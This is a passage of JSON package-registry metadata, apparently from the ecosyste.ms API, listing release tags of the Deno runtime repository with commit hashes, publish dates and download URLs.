tories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v